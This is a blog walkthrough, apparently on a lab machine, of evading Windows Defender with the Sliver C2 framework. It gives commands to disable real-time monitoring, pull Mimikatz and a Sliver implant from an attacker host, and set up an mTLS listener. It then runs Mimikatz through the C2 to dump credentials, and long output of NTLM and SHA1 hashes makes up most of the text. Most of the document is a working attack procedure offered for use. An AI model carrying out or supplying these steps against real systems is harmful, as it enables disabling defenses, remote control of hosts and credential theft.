Windows AV and Policy Evasion with Sliver as C2 Operator

Windows Evasion Overview

PS yo, wanting to clarify that I'm not an expert, just a student and developer. I've mixed up various techniques from online sources and aim to share them with those who may be unfamiliar. While I've successfully executed the evasion, there's a possibility of inaccuracies in my statements.

To improve our evasion strategy, we should minimize disk involvement. What this means. Basically, we need to prevent any malicious data from interacting with the machine's disk.

mimikatz-photo-fail

This blog are going to be practical!

Running Mimikatz from Sliver (attacker-side) are much reliable againts Windows AV than straight running the executable on the target machine.

Sliver implements a distributed architecture that clearly separates server, client, and operator components, allowing maximum operational flexibility:

+---------------+       +----------------+       +------------------+
| Sliver Server |<----->| Sliver Console |<----->| Sliver Implants  |
+---------------+       +----------------+       +------------------+
     ^                                                   ^
     |                                                   |
     +---- Multiplexed C2 ----- Encrypted communication -+

C2 Operation with Sliver

As lil bit of explaination, C2 frameworks or Command and Control (C&C) infrastructure are used by security professionals e.g Red Teams, Pentester, ASR, etc to remotely control compromised machines during security assessments. They are also leveraged by Cybercrimes for the same reason.

Sliver C2 gets more and more traction from Threat Actors, often seen as an alternative from Cobalt Strike.

One of the reason I like-em is because of the modular xtension package manager (armory) allowing easy install (automatic compilation) of various 3rd party tools such as BOFs and .NET tooling like Ghostpack Rubeus, Seatbelt, SharpUp, Certify, etc or even Mimikatz.

It's also have sweet kit for:

  • Screenshots
  • Port-forwards

And many more which I can't explain nor tell one by one.

Attack Scenario Fails

PS: This is an assumed breached.

Here I get Administrator shells via NTLM login from our Kali attack machine with wmiexec.py from impacket, and wanting to deploy my Mimikatz for post-exploitation reasons, etc.

Logon:

wmiexec.py administrator@multimaster.megacorp.local -hashes :69cbf4a9b7415c9e1caf93d51d971be0 -shell-type powershell
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> whoami
megacorp\administrator

Let's assume this is an enueration upon the Windows SYSTEM reading:

PS C:\> systeminfo

Host Name:                 MULTIMASTER
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA432
Original Install Date:     9/25/2019, 10:57:13 AM
System Boot Time:          1/22/2024, 10:28:43 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.24504846.B64.2501180334, 1/18/2025
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,161 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,500 MB
Virtual Memory: In Use:    2,299 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    MEGACORP.LOCAL
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB3199986
                           [02]: KB4054590
                           [03]: KB4512574
                           [04]: KB4520724
                           [05]: KB4530689
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.10.2
                                 IP address(es)
                                 [01]: 10.129.95.200
                                 [02]: fe80::cc6d:7531:a3c5:2338
                                 [03]: dead:beef::cc6d:7531:a3c5:2338
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

PS C:\> [System.Environment]::Is64BitOperatingSystem
True
PS C:\users\administrator> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            aldom                    alice                    
alyx                     andrew                   ckane                    
cyork                    dai                      DefaultAccount           
Guest                    ilee                     james                    
jorden                   jsmmons                  kpage                    
krbtgt                   lana                     nbourne                  
okent                    pmartin                  rmartin                  
sbauer                   svc-nas                  svc-sql                  
tushikikatomo            zac                      zpowers                  
The command completed with one or more errors.

Here I have transfer the x64 Mimikatz binary to targets and wanting it to run:

PS, turn-off AV:

Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\users\administrator> Set-MpPreference -DisableRealtimeMonitoring $true
                    
PS C:\users\administrator> iwr -uri http://10.10.14.40/mimikatz.exe -outfile mimi.exe

PS C:\users\administrator> dir


    Directory: C:\users\administrator


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-----         1/9/2020   3:18 AM                .vscode                       
d-r---         1/9/2020   2:45 PM                Contacts                      
d-r---         1/9/2020   4:43 PM                Desktop                       
d-r---         1/9/2020   4:35 PM                Documents                     
d-r---         1/9/2020   2:45 PM                Downloads                     
d-r---         1/9/2020   2:45 PM                Favorites                     
d-r---         1/9/2020   2:45 PM                Links                         
d-r---         1/9/2020   2:45 PM                Music                         
d-r---         1/9/2020   2:45 PM                Pictures                      
d-r---         1/9/2020   2:45 PM                Saved Games                   
d-r---         1/9/2020   2:45 PM                Searches                      
d-r---         1/9/2020   2:45 PM                Videos                        
-a----        1/22/2024  10:39 PM        1250056 mimi.exe

The real question, "is it going to run?"

mimikatz-photo-fail

And there we go, we fail:

With code results of:

"Error">because the file contains a virus or potentially unwanted softwareAt line:1

This Mimikatz are on production 2 years older than this machine, turns-out Windows can still detect a malicious processes.

Attack Scenario Pwned!!

In a big picture how we successfully gain Mimikatz to run are via the sliver frameworks attack kit, what we sould manage to deploy are the agent with binary that anables us to interact with the target SYSTEM, the trick here is when we build our agents nor beacons, whatever.

Sliver Set-Up

I'm going to create the agent with Arch AMD64 and using MTLS for our Fellow:

┌──(kali㉿kali)-[~]
└─$ sliver-server                
[*] Loaded 22 aliases from disk
[*] Loaded 151 extension(s) from disk

          ██████  ██▓     ██▓ ██▒   █▓▓█████  ██▀███
        ▒██    ▒ ▓██▒    ▓██▒▓██░   █▒▓█   ▀ ▓██ ▒ ██▒
        ░ ▓██▄   ▒██░    ▒██▒ ▓██  █▒░▒███   ▓██ ░▄█ ▒
          ▒   ██▒▒██░    ░██░  ▒██ █░░▒▓█  ▄ ▒██▀▀█▄
        ▒██████▒▒░██████▒░██░   ▒▀█░  ░▒████▒░██▓ ▒██▒
        ▒ ▒▓▒ ▒ ░░ ▒░▓  ░░▓     ░ ▐░  ░░ ▒░ ░░ ▒▓ ░▒▓░
        ░ ░▒  ░ ░░ ░ ▒  ░ ▒ ░   ░ ░░   ░ ░  ░  ░▒ ░ ▒░
        ░  ░  ░    ░ ░    ▒ ░     ░░     ░     ░░   ░
                  ░      ░  ░ ░        ░     ░  ░   ░

All hackers gain epic
[*] Server v1.5.42 - kali
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

[server] sliver > generate --mtls 10.10.14.40:9001 --os windows --arch amd64 --format exe --save /tmp/agent.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 32s
[*] Implant saved to /tmp/agent.exe

[server] sliver > mtls --lhost 10.10.14.40 --lport 9001

[*] Starting mTLS listener ...

[*] Successfully started job #1

That's it for set-up, now we just need to sent that agent.exe to the targets computer and run it, the access are now back at the wmiexec.py processes earlier.

Targets machine:

PS C:\programdata> Set-MpPreference -DisableRealtimeMonitoring $true

PS C:\programdata> iwr -uri http://10.10.14.40/agent.exe -outfile agent.exe

PS C:\programdata> dir


    Directory: C:\programdata


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-----        7/16/2016   6:23 AM                Comms                         
d---s-         1/9/2020   1:18 PM                Microsoft                     
d-----        7/19/2021   1:07 AM                Package Cache                 
d-----        9/25/2019  10:54 AM                regid.1991-06.com.microsoft   
d-----        7/16/2016   6:23 AM                SoftwareDistribution          
d-----       11/20/2016   5:15 PM                USOPrivate                    
d-----       11/20/2016   5:15 PM                USOShared                     
da----        7/19/2021   1:07 AM                VMware                        
d-----         1/7/2020   7:45 PM                VsTelemetry                   
-a----        1/22/2024  10:52 PM       15614976 agent.exe

Done, we now just needed to activate it and wait for the beacons to came!

.\agent.exe

Back to our Kali Attack machine, sliver manage to get the goods!

[*] Session 0ce336ed NATIONAL_CLIENT - 10.129.95.200:49843 (MULTIMASTER) - windows/amd64 - Fri, 23 Jan 2024 06:46:29 UTC

[*] No beacons 🙁

[server] sliver > sessions

 ID         Transport   Remote Address        Hostname      Username                 Operating System   Health  
========== =========== ===================== ============= ======================== ================== =========
 0ce336ed   mtls        10.129.95.200:49843   MULTIMASTER   MEGACORP\Administrator   windows/amd64      [ALIVE] 

[server] sliver > use 0ce336ed

[*] Active session NATIONAL_CLIENT (0ce336ed-107a-4751-996d-a0f2863d60f1)

[server] sliver (NATIONAL_CLIENT) >

Checking correct call-back:

[server] sliver (NATIONAL_CLIENT) > whoami

Logon ID: MEGACORP\Administrator
[*] Current Token ID: MEGACORP\Administrator

And test for Mimikatz in frameworks:

[server] sliver (NATIONAL_CLIENT) > mimikatz

[*] Successfully executed mimikatz
[*] Got output:

  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2024 22:19:06
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # C:\programdata\agent.exe
ERROR mimikatz_doLocal ; "C:\programdata\agent.exe" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

It's a success, and we manage to get-em.

For higher-profit this is the commands.

[server] sliver (NATIONAL_CLIENT) > mimikatz "token::elevate privilege::debug sekurlsa::logonpasswords exit"

[*] Successfully executed mimikatz
[*] Got output:

  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2024 22:19:06
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

536     {0;000003e7} 1 D 32978          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;006648d1} 0 D 6846594     MEGACORP\Administrator  S-1-5-21-3167813660-1240564177-918740779-500(15g,26p)        Primary
 * Thread Token  : {0;000003e7} 1 D 6955728     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 381094 (00000000:0005d0a6)
Session           : Interactive from 1
User Name         : cyork
Domain            : MEGACORP
Logon Server      : MULTIMASTER
Logon Time        : 1/22/2024 10:29:55 PM
SID               : S-1-5-21-3167813660-1240564177-918740779-3107
        msv :
         [00000003] Primary
         * Username : cyork
         * Domain   : MEGACORP
         * NTLM     : 06327297532725a64e1edec0aad81cfe
         * SHA1     : 56380d6f034d060faca78ae4dc90842bbfc5ffe1
         * DPAPI    : 562c87ff69e458a64559c5a718700f43
        tspkg :
        wdigest :
         * Username : cyork
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : cyork
         * Domain   : MEGACORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 145404 (00000000:000237fc)
Session           : Service from 0
User Name         : MSSQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 1/22/2024 10:29:19 PM
SID               : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP.LOCAL
         * Password : 6e 4f 77 d9 71 28 b9 a6 26 8b 59 aa b5 bf 6f 79 b4 af fe c0 c3 55 80 fd a3 d5 79 cd e0 51 d2 a7 32 60 10 cc 08 8e fe e3 17 d2 88 92 a3 6e a1 33 2a cb 33 99 6a b3 69 d0 25 dc 17 d0 64 aa 88 ed a9 f1 4d 23 3c 24 95 8d a3 95 34 ce 06 37 e2 12 5c 24 7a 0d 2c cb 85 51 04 0b 7b e9 6a df 1f c0 08 5b 48 7b 2f 95 3a 65 bf 94 7d f6 da ae e2 97 f7 6e b2 28 0b b7 fd 31 c0 51 58 0b 18 ee 11 7f 46 71 79 27 02 d8 7e b4 6f 45 98 e9 b5 44 67 c1 da b0 6d 49 41 5b 07 46 dc 60 40 4e cf f6 11 f9 0b 76 92 f9 40 9e f9 50 35 a5 af 0e 03 30 28 5e 25 62 fc b5 67 31 c7 eb c7 1e 96 4e 35 83 53 fe e1 e1 1a a5 88 d6 87 33 b0 48 22 5d bc d0 8c 7a 80 0f 6f a0 57 74 91 91 da a8 26 e6 ae a6 e7 6b d7 8b 54 1e 51 01 3a d9 54 e1 88 4c f9 53 de f8 
        ssp :
        credman :

Authentication Id : 0 ; 69226 (00000000:00010e6a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:53 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP.LOCAL
         * Password : 6e 4f 77 d9 71 28 b9 a6 26 8b 59 aa b5 bf 6f 79 b4 af fe c0 c3 55 80 fd a3 d5 79 cd e0 51 d2 a7 32 60 10 cc 08 8e fe e3 17 d2 88 92 a3 6e a1 33 2a cb 33 99 6a b3 69 d0 25 dc 17 d0 64 aa 88 ed a9 f1 4d 23 3c 24 95 8d a3 95 34 ce 06 37 e2 12 5c 24 7a 0d 2c cb 85 51 04 0b 7b e9 6a df 1f c0 08 5b 48 7b 2f 95 3a 65 bf 94 7d f6 da ae e2 97 f7 6e b2 28 0b b7 fd 31 c0 51 58 0b 18 ee 11 7f 46 71 79 27 02 d8 7e b4 6f 45 98 e9 b5 44 67 c1 da b0 6d 49 41 5b 07 46 dc 60 40 4e cf f6 11 f9 0b 76 92 f9 40 9e f9 50 35 a5 af 0e 03 30 28 5e 25 62 fc b5 67 31 c7 eb c7 1e 96 4e 35 83 53 fe e1 e1 1a a5 88 d6 87 33 b0 48 22 5d bc d0 8c 7a 80 0f 6f a0 57 74 91 91 da a8 26 e6 ae a6 e7 6b d7 8b 54 1e 51 01 3a d9 54 e1 88 4c f9 53 de f8 
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : MULTIMASTER$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:52 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : multimaster$
         * Domain   : MEGACORP.LOCAL
         * Password : 6e 4f 77 d9 71 28 b9 a6 26 8b 59 aa b5 bf 6f 79 b4 af fe c0 c3 55 80 fd a3 d5 79 cd e0 51 d2 a7 32 60 10 cc 08 8e fe e3 17 d2 88 92 a3 6e a1 33 2a cb 33 99 6a b3 69 d0 25 dc 17 d0 64 aa 88 ed a9 f1 4d 23 3c 24 95 8d a3 95 34 ce 06 37 e2 12 5c 24 7a 0d 2c cb 85 51 04 0b 7b e9 6a df 1f c0 08 5b 48 7b 2f 95 3a 65 bf 94 7d f6 da ae e2 97 f7 6e b2 28 0b b7 fd 31 c0 51 58 0b 18 ee 11 7f 46 71 79 27 02 d8 7e b4 6f 45 98 e9 b5 44 67 c1 da b0 6d 49 41 5b 07 46 dc 60 40 4e cf f6 11 f9 0b 76 92 f9 40 9e f9 50 35 a5 af 0e 03 30 28 5e 25 62 fc b5 67 31 c7 eb c7 1e 96 4e 35 83 53 fe e1 e1 1a a5 88 d6 87 33 b0 48 22 5d bc d0 8c 7a 80 0f 6f a0 57 74 91 91 da a8 26 e6 ae a6 e7 6b d7 8b 54 1e 51 01 3a d9 54 e1 88 4c f9 53 de f8 
        ssp :
        credman :

Authentication Id : 0 ; 381075 (00000000:0005d093)
Session           : Interactive from 1
User Name         : cyork
Domain            : MEGACORP
Logon Server      : MULTIMASTER
Logon Time        : 1/22/2024 10:29:55 PM
SID               : S-1-5-21-3167813660-1240564177-918740779-3107
        msv :
         [00000003] Primary
         * Username : cyork
         * Domain   : MEGACORP
         * NTLM     : 06327297532725a64e1edec0aad81cfe
         * SHA1     : 56380d6f034d060faca78ae4dc90842bbfc5ffe1
         * DPAPI    : 562c87ff69e458a64559c5a718700f43
        tspkg :
        wdigest :
         * Username : cyork
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : cyork
         * Domain   : MEGACORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/22/2024 10:29:20 PM
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 145363 (00000000:000237d3)
Session           : Service from 0
User Name         : SQLTELEMETRY
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 1/22/2024 10:29:19 PM
SID               : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP.LOCAL
         * Password : 6e 4f 77 d9 71 28 b9 a6 26 8b 59 aa b5 bf 6f 79 b4 af fe c0 c3 55 80 fd a3 d5 79 cd e0 51 d2 a7 32 60 10 cc 08 8e fe e3 17 d2 88 92 a3 6e a1 33 2a cb 33 99 6a b3 69 d0 25 dc 17 d0 64 aa 88 ed a9 f1 4d 23 3c 24 95 8d a3 95 34 ce 06 37 e2 12 5c 24 7a 0d 2c cb 85 51 04 0b 7b e9 6a df 1f c0 08 5b 48 7b 2f 95 3a 65 bf 94 7d f6 da ae e2 97 f7 6e b2 28 0b b7 fd 31 c0 51 58 0b 18 ee 11 7f 46 71 79 27 02 d8 7e b4 6f 45 98 e9 b5 44 67 c1 da b0 6d 49 41 5b 07 46 dc 60 40 4e cf f6 11 f9 0b 76 92 f9 40 9e f9 50 35 a5 af 0e 03 30 28 5e 25 62 fc b5 67 31 c7 eb c7 1e 96 4e 35 83 53 fe e1 e1 1a a5 88 d6 87 33 b0 48 22 5d bc d0 8c 7a 80 0f 6f a0 57 74 91 91 da a8 26 e6 ae a6 e7 6b d7 8b 54 1e 51 01 3a d9 54 e1 88 4c f9 53 de f8 
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:53 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 69747 (00000000:00011073)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:53 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 289fcbb2f2a91035588e3f090e0a5798
         * SHA1     : 74600e570585ceda3ce2b5a6b692ee76c79affd9
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP.LOCAL
         * Password : e3 46 5f c2 15 01 2a ad 9b 1f 7e 0b 37 00 19 bf 52 da 56 b1 c2 0b 5e 7d 00 74 2b 65 c3 4e e3 71 22 b1 4a 4e 9e 00 fd 6d 7a 46 73 80 fc 0b 8b 50 60 09 78 ac 3f 22 07 93 00 98 da 9d 62 c8 78 0b 6d 94 07 4d ec 27 d0 70 ac e5 e0 1c f6 07 19 d5 bd 83 fc 59 f2 b0 a0 89 48 28 64 f7 cd 0f 0e 60 b1 bf 81 2a 20 f4 9e 07 6a 5e e1 23 cd 26 13 c4 30 fe a3 60 e7 36 7a f1 21 fb 1d 41 56 33 2b 01 a1 80 e5 09 fe 8a 1f f6 00 d4 9d 00 09 64 ca d4 24 c0 4e a9 f7 00 58 f5 6e 01 cf 84 bf 9b 0b 24 0d fb 7b c9 1f 33 a2 1a bb c3 cd 4a f1 c7 07 67 53 55 94 39 f1 a5 e5 6b f6 60 c2 b3 d2 d1 88 fc f8 c6 eb 1e 86 20 17 2b 87 a1 95 10 fc bd 35 ea 2f ee 76 2a dc 2c 2e bd 31 1e e7 a5 a3 29 b9 4d 1c 6d d1 c3 83 03 1c 89 59 d0 47 a5 e2 88 31 13 
        ssp :
        credman :

Authentication Id : 0 ; 38349 (00000000:000095cd)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:51 PM
SID               : 
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : MULTIMASTER$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:51 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : multimaster$
         * Domain   : MEGACORP.LOCAL
         * Password : (null)
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!
[server] sliver (NATIONAL_CLIENT) > mimikatz sekurlsa::logonpasswords

[*] Successfully executed mimikatz
[*] Got output:

  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2024 22:19:06
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 381094 (00000000:0005d0a6)
Session           : Interactive from 1
User Name         : cyork
Domain            : MEGACORP
Logon Server      : MULTIMASTER
Logon Time        : 1/22/2024 10:29:55 PM
SID               : S-1-5-21-3167813660-1240564177-918740779-3107
        msv :
         [00000003] Primary
         * Username : cyork
         * Domain   : MEGACORP
         * NTLM     : 06327297532725a64e1edec0aad81cfe
         * SHA1     : 56380d6f034d060faca78ae4dc90842bbfc5ffe1
         * DPAPI    : 562c87ff69e458a64559c5a718700f43
        tspkg :
        wdigest :
         * Username : cyork
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : cyork
         * Domain   : MEGACORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 145404 (00000000:000237fc)
Session           : Service from 0
User Name         : MSSQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 1/22/2024 10:29:19 PM
SID               : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP.LOCAL
         * Password : 6e 4f 77 d9 71 28 b9 a6 26 8b 59 aa b5 bf 6f 79 b4 af fe c0 c3 55 80 fd a3 d5 79 cd e0 51 d2 a7 32 60 10 cc 08 8e fe e3 17 d2 88 92 a3 6e a1 33 2a cb 33 99 6a b3 69 d0 25 dc 17 d0 64 aa 88 ed a9 f1 4d 23 3c 24 95 8d a3 95 34 ce 06 37 e2 12 5c 24 7a 0d 2c cb 85 51 04 0b 7b e9 6a df 1f c0 08 5b 48 7b 2f 95 3a 65 bf 94 7d f6 da ae e2 97 f7 6e b2 28 0b b7 fd 31 c0 51 58 0b 18 ee 11 7f 46 71 79 27 02 d8 7e b4 6f 45 98 e9 b5 44 67 c1 da b0 6d 49 41 5b 07 46 dc 60 40 4e cf f6 11 f9 0b 76 92 f9 40 9e f9 50 35 a5 af 0e 03 30 28 5e 25 62 fc b5 67 31 c7 eb c7 1e 96 4e 35 83 53 fe e1 e1 1a a5 88 d6 87 33 b0 48 22 5d bc d0 8c 7a 80 0f 6f a0 57 74 91 91 da a8 26 e6 ae a6 e7 6b d7 8b 54 1e 51 01 3a d9 54 e1 88 4c f9 53 de f8 
        ssp :
        credman :

Authentication Id : 0 ; 69226 (00000000:00010e6a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:53 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP.LOCAL
         * Password : 6e 4f 77 d9 71 28 b9 a6 26 8b 59 aa b5 bf 6f 79 b4 af fe c0 c3 55 80 fd a3 d5 79 cd e0 51 d2 a7 32 60 10 cc 08 8e fe e3 17 d2 88 92 a3 6e a1 33 2a cb 33 99 6a b3 69 d0 25 dc 17 d0 64 aa 88 ed a9 f1 4d 23 3c 24 95 8d a3 95 34 ce 06 37 e2 12 5c 24 7a 0d 2c cb 85 51 04 0b 7b e9 6a df 1f c0 08 5b 48 7b 2f 95 3a 65 bf 94 7d f6 da ae e2 97 f7 6e b2 28 0b b7 fd 31 c0 51 58 0b 18 ee 11 7f 46 71 79 27 02 d8 7e b4 6f 45 98 e9 b5 44 67 c1 da b0 6d 49 41 5b 07 46 dc 60 40 4e cf f6 11 f9 0b 76 92 f9 40 9e f9 50 35 a5 af 0e 03 30 28 5e 25 62 fc b5 67 31 c7 eb c7 1e 96 4e 35 83 53 fe e1 e1 1a a5 88 d6 87 33 b0 48 22 5d bc d0 8c 7a 80 0f 6f a0 57 74 91 91 da a8 26 e6 ae a6 e7 6b d7 8b 54 1e 51 01 3a d9 54 e1 88 4c f9 53 de f8 
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : MULTIMASTER$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:52 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : multimaster$
         * Domain   : MEGACORP.LOCAL
